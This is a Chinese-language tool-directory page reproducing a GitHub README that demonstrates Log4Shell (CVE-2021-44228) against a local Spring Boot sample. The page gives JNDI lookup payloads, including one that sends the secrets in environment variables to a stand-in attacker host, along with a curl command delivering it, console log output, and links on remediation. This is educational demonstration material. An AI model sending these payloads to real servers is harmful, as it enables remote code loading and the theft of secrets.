Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
log4j-vulnerability — Log4Shell (CVE-2021-44228) 是 Log4j 中的一个零日漏洞 | Kitploit
工具/GitHubGitHub/mazhar-hassan/log4j-vulnerability
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubmazhar-hassan/log4j-vulnerability

log4j-vulnerability

Log4Shell (CVE-2021-44228) 是 Log4j 中的一个零日漏洞

查看仓库
24年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4Shell(CVE-2021-44228)是 Log4j 中的一个零日漏洞

Log4J 漏洞

发现日期: 2021年11月24日

修复日期: 2021年12月6日

攻击演示

点击下方观看YouTube视频

攻击演示

示例应用

该示例应用是一个Spring Boot应用,使用log4j作为日志框架,并在本地主机的8080端口上运行,同时设置了以下环境变量

观看视频说明:

https://youtu.be/bb6pgWrm7tA

环境变量

key=jason.bourne;secret=Treadstone

攻击

POST http://localhost:8080//v1/public/log-test

参数:

value=${jndi:ldap://some-random-hacking-site.com}

来自客户端的攻击

获取环境变量

通过使用以下字符串可以获取环境变量 value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}

Curl 命令

curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'

日志控制台

2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)

修复

https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

确认

mvn dependency:tree 确保所有依赖的 jar 包均不指向存在漏洞的 log4j 版本。

Techflix Youtube 安全播放列表

https://www.youtube.com/watch?v=bb6pgWrm7tA&list=PLLqjNYIgOqeQl6NaeIeUhvNcWdpOVNkRi&index=1

下载工具